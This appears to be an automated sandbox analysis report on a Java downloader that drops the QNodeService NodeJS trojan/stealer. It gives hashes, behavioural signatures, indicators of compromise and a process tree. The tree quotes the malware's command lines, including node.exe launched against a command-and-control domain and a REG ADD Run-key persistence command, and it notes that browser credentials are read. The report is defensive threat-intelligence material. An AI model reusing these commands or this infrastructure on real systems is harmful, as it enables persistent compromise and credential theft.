Analysis
-
max time kernel
76s -
max time network
114s -
platform
windows10_x64 -
resource
win10 -
submitted
28-10-2020 08:43
Static task
static1
Behavioral task
behavioral1
Sample
20201025_8428223.jar
Resource
win7
Behavioral task
behavioral2
Sample
20201025_8428223.jar
Resource
win10
General
-
Target
20201025_8428223.jar
-
Size
78KB
-
MD5
1dd1c8e9bfa0796e09e43d9ca2e7ff8a
-
SHA1
45084942b2387c4fd4fa7c751344efd126863c16
-
SHA256
0a27689398ba97857fe915d7bf1f3d62249d4b8f26ab713f55bdfb556733c9df
-
SHA512
9a9ae2cbd27bfa9e7fd3adae560419b2c377bff7b5b9199d82365d0e7627c0b36e0cb9af9008947fb715579b415ac381d86e1c0f2c3700f7f2d6652b27c05865
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2008 node.exe 3732 node.exe 1740 node.exe -
Loads dropped DLL 6 IoCs
pid Process 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\30f3f008-19bc-4183-b563-ddabc3e29d93 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab69-170.dat js behavioral2/files/0x000100000001ab69-174.dat js behavioral2/files/0x000100000001ab69-178.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 wtfismyip.com 29 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2008 node.exe 2008 node.exe 2008 node.exe 2008 node.exe 3732 node.exe 3732 node.exe 3732 node.exe 3732 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe 1740 node.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3992 wrote to memory of 3560 3992 java.exe 75 PID 3992 wrote to memory of 3560 3992 java.exe 75 PID 3560 wrote to memory of 2008 3560 javaw.exe 79 PID 3560 wrote to memory of 2008 3560 javaw.exe 79 PID 2008 wrote to memory of 3732 2008 node.exe 81 PID 2008 wrote to memory of 3732 2008 node.exe 81 PID 3732 wrote to memory of 1740 3732 node.exe 82 PID 3732 wrote to memory of 1740 3732 node.exe 82 PID 1740 wrote to memory of 728 1740 node.exe 84 PID 1740 wrote to memory of 728 1740 node.exe 84 PID 728 wrote to memory of 1316 728 cmd.exe 85 PID 728 wrote to memory of 1316 728 cmd.exe 85 PID 1740 wrote to memory of 3652 1740 node.exe 86 PID 1740 wrote to memory of 3652 1740 node.exe 86 PID 3652 wrote to memory of 540 3652 cmd.exe 87 PID 3652 wrote to memory of 540 3652 cmd.exe 87
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\20201025_8428223.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\bc568652.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JQDjxC\boot.js --hub-domain empefarm.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JQDjxC\boot.js --hub-domain empefarm.ddns.net5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /F"6⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\reg.exeREG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /F7⤵PID:540
-
-
-
-
-
-